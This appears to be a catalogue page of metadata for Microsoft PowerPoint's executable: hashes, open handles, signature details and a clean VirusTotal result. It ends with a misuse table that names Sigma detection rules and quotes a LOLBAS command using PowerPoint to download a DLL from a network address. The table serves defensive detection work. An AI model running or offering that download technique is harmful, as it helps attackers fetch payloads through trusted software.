POWERPNT.EXE

  • File Path: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
  • Description: Microsoft PowerPoint

Screenshot

POWERPNT.EXE POWERPNT.EXE

Hashes

Type Hash
MD5 CF80E1F9CA40B53C3F1BEB961290F630
SHA1 83C5505DF692CDE2300E71B42A6D72020CD64FBA
SHA256 0AB3D664C94ABE60AB977311AC3195FC03BC147806CE4F538E1C64BD6507746E
SHA384 134ED3A88DBD82CBE505916594E4887C89AD90F9E0FE31F3AAB8D06CF350C9637D2D37DB93A8D3DF5B41AB41245ED383
SHA512 BEDB1FE2DDCDD7789508506685B3C5E6D7F5602FA25ABE52B946F6B0AFDB47935373D76E10D632B1DD627FE174B5DEF5C986BD0238C8A482B738B5A765D65CFD
SSDEEP 6144:wKw4BeXsm81c57ZXFzY5Ucyw4TapP25xxlq4cUcMeTO1o:cyKs78A5UcyOPexxPcUcMe/
IMP 8A07A9428B950BCD4CC11FDA15BF5856
PESHA1 725BCBADE660D277BAA0DFF0DCD26FE2A8F6D3D0
PE256 66BB61701F533A7976C477FD12D5B7BBCC46671D296D95D34B90C74D693AC476

Runtime Data

Window Title:

Opening - PowerPoint (Read Only)

Open Handles:

Path Type
(R–) C:\ProgramData\Microsoft\Office\ClickToRunPackageLocker File
(R–) C:\Users\user\AppData\Local\Microsoft\Office\PowerP16.customUI File
(R-D) C:\Program Files (x86)\Microsoft Office\root\Office16\ONBttnPPT.dll File
(R-D) C:\Windows\Fonts\StaticCache.dat File
(R-D) C:\Windows\System32\en-US\d2d1.dll.mui File
(R-D) C:\Windows\System32\en-US\KernelBase.dll.mui File
(R-D) C:\Windows\System32\en-US\mswsock.dll.mui File
(R-D) C:\Windows\System32\en-US\propsys.dll.mui File
(R-D) C:\Windows\System32\en-US\Windows.Security.Authentication.Web.Core.dll.mui File
(R-D) C:\Windows\System32\en-US\winnlsres.dll.mui File
(R-D) C:\Windows\SystemResources\imageres.dll.mun File
(R-D) C:\Windows\SysWOW64\en-US\user32.dll.mui File
(R-D) C:\Windows\SysWOW64\stdole2.tlb File
(RW-) C:\Users\user\Documents File
(RW-) C:\Windows File
(RW-) C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.488_none_11b1e5df2ffd8627 File
(RW-) C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.19041.508_none_429cdbca8a8ffa94 File
(RWD) C:\Windows\Fonts File
(RWD) C:\Windows\Fonts\segoeui.ttf File
\BaseNamedObjects__ComCatalogCache__ Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000a.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*cversions.2 Section
\BaseNamedObjects\F932B6C7-3A20-46A0-B8A0-8894AA421973 Section
\BaseNamedObjects\NLS_CodePage_1252_3_2_0_0 Section
\BaseNamedObjects\NLS_CodePage_437_3_2_0_0 Section
\BaseNamedObjects\windows_shell_global_counters Section
\Sessions\1\BaseNamedObjects\10FM_ACB_S-1-5-5-0-257318 Section
\Sessions\1\BaseNamedObjects\10FM_ACBBD_S-1-5-5-0-257318 Section
\Sessions\1\BaseNamedObjects\6c8HWNDInterface:8c042e Section
\Sessions\1\BaseNamedObjects\UrlZonesSM_user Section
\Sessions\1\BaseNamedObjects\windows_shell_global_counters Section
\Sessions\1\BaseNamedObjects\windows_webcache_counters_{9B6AB5B3-91BC-4097-835C-EA2DEC95E9CC}_S-1-5-21-2047949552-857980807-821054962-504 Section
\Sessions\1\Windows\Theme64749523 Section
\Windows\Theme1120315852 Section

Loaded Modules:

Path
C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\System32\wow64.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll

Signature

  • Status: Signature verified.
  • Serial: 33000002CE7C9ACE7D905ED2B70000000002CE
  • Thumbprint: B10607FB914700B40F794610850C1DE0A21566C1
  • Issuer: CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: POWERPNT.EXE
  • Product Name: Microsoft Office
  • Company Name: Microsoft Corporation
  • File Version: 16.0.12527.20482
  • Product Version: 16.0.12527.20482
  • Language: Language Neutral
  • Legal Copyright:
  • Machine Type: 32-bit

File Scan

  • VirusTotal Detections: 0/72
  • VirusTotal Link: https://www.virustotal.com/gui/file/0ab3d664c94abe60ab977311ac3195fc03bc147806ce4f538e1c64bd6507746e/detection/

Possible Misuse

The following table contains possible examples of POWERPNT.EXE being misused. While POWERPNT.EXE is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma godmode_sigma_rule.yml - '\POWERPNT.exe' DRL 1.0
sigma edr_command_execution_by_office_applications.yml - '\powerpnt.exe' DRL 1.0
sigma sysmon_suspicious_remote_thread.yml - '\powerpnt.exe' DRL 1.0
sigma file_event_win_script_creation_by_office_using_file_ext.yml - 'powerpnt.exe' DRL 1.0
sigma image_load_suspicious_dbghelp_dbgcore_load.yml - '\powerpnt.exe' DRL 1.0
sigma image_load_susp_office_dotnet_assembly_dll_load.yml - '\powerpnt.exe' DRL 1.0
sigma image_load_susp_office_dotnet_clr_dll_load.yml - '\powerpnt.exe' DRL 1.0
sigma image_load_susp_office_dotnet_gac_dll_load.yml - '\powerpnt.exe' DRL 1.0
sigma image_load_susp_office_dsparse_dll_load.yml - '\powerpnt.exe' DRL 1.0
sigma image_load_susp_office_kerberos_dll_load.yml - '\powerpnt.exe' DRL 1.0
sigma image_load_susp_winword_vbadll_load.yml - '\powerpnt.exe' DRL 1.0
sigma image_load_susp_winword_wmidll_load.yml - '\powerpnt.exe' DRL 1.0
sigma proc_creation_win_lolbins_by_office_applications.yml - powerpnt.exe DRL 1.0
sigma proc_creation_win_office_applications_spawning_wmi_commandline.yml - powerpnt.exe DRL 1.0
sigma proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml - powerpnt.exe DRL 1.0
sigma proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml - powerpnt.exe DRL 1.0
sigma proc_creation_win_office_shell.yml - '\POWERPNT.exe' DRL 1.0
sigma proc_creation_win_office_spawning_wmi_commandline.yml - powerpnt.exe DRL 1.0
sigma proc_creation_win_office_spawn_exe_from_users_directory.yml - '\POWERPNT.exe' DRL 1.0
sigma proc_creation_win_susp_control_cve_2021_40444.yml - '\powerpnt.exe' DRL 1.0
sigma proc_creation_win_susp_msoffice.yml - '\powerpnt.exe' DRL 1.0
sigma proc_creation_win_susp_powershell_parent_process.yml - '\powerpnt.exe' DRL 1.0
sigma file_event_executable_and_script_creation_by_office_using_file_ext.yml - 'powerpnt.exe' DRL 1.0
LOLBAS Powerpnt.yml Name: Powerpnt.exe  
LOLBAS Powerpnt.yml - Command: Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"  
LOLBAS Powerpnt.yml - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files (x86)\Microsoft Office\Office16\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files\Microsoft Office\Office16\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files (x86)\Microsoft Office\Office15\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files\Microsoft Office\Office15\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files (x86)\Microsoft Office\Office14\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files\Microsoft Office\Office14\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files (x86)\Microsoft Office\Office12\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files\Microsoft Office\Office12\Powerpnt.exe  
signature-base crime_enfal.yar $s0 = “POWERPNT.exe” fullword ascii CC BY-NC 4.0

MIT License. Copyright (c) 2020-2021 Strontic.